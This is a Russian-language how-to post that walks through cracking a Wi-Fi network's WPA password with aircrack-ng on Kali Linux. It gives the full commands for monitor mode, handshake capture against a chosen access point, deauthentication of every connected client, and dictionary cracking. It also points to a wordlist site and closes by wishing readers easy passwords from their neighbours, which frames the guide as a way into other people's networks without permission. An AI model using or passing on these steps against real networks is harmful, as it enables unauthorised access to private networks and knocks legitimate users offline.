Взлом Wifi ( Aircrack )

Привет парни) Сегодня будем взламывать вай-фай очередной раз, уже другим методом, более сложным. Поможет вам, если простым не получилось.

Для начала вот статья, как поставить Linux http://telegra.ph/Sozdanie-zagruzochnoj-fleshki-Kali-Linux-03-21

Суть этого метода заключается в перехвате хендшейка, или как его еще называют, рукопожатия и дальнейшей его расшифровке. Рукопожатие это грубо говоря момент соединения роутера с устройством (смартфон, ноутбук и т.д.). В нем есть зашифрованный пароль от вайфая, который нас и интересует. Ну что же, начнём.

Мы воспользуемся инструментом Aircrack-ng.

Я буду это делать через Kali Linux, где он предустановлен.

Открываем терминал и переводим нашу вай-фай карточку в режим мониторинга вот такой командой:

sudo airmon-ng start wlan0mon

После этого (изменения режима с приема на мониторинг) мы сможем видеть весь проходящий вокруг нас трафик, для этого вводим команду airodump-ng:

sudo airodump-ng wlan0mon

Мы видим такую картину. Точки доступа здесь сверху, а пользователи снизу:

Дальше займемся непосредственно перехватом хендшейка) Выбираем нужную нам точку доступа и запускаем airodump-ng непосредственно на неё следующей командой:

 sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -write /root/Desktop/hack wlan0mon

Настройки:

-c           Канал беспроводной сети

--bssid MAC адрес точки доступа

--write Файл в который будет записано рукопожатие

wlan0mon         Сетевой интерфейс

Теперь ускорим процесс перехвата хендшейка путем того, что отключим пользователя от точки, чтобы он еще раз прошел авторизацию. Можно этот шаг пропустить, если вы не хотите этого делать (палевно чутка, но зато быстро).

Деаутентифицируем всех пользователей точки:

 sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon

--deauth 5 Сколько deauth сообщений отправить (0 — без ограничений)

-a           MAC адрес точки доступа

Wlan0mon      Сетевой интерфейс

После этого клиент еще раз подключится к сети и мы перехватим хендшейк.

Дальше необходимо расшифровать пароль из перехваченного рукопожатия методом перебора по словарю.

Словари можно найти в интернете) http://wordbook.xyz/download/ вот хороший сайт с разными словарями.

Выполняем такую команду:

 aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 hack.cap

Настройки:

-w          Путь к словарю с паролями

-b           MAC адрес точки доступа

hack.cap  файл с нашим перехваченным рукопожатием

И ждем) В случае успеха нас ждет подобное сообщение:

Простых вам соседских паролей, друзья))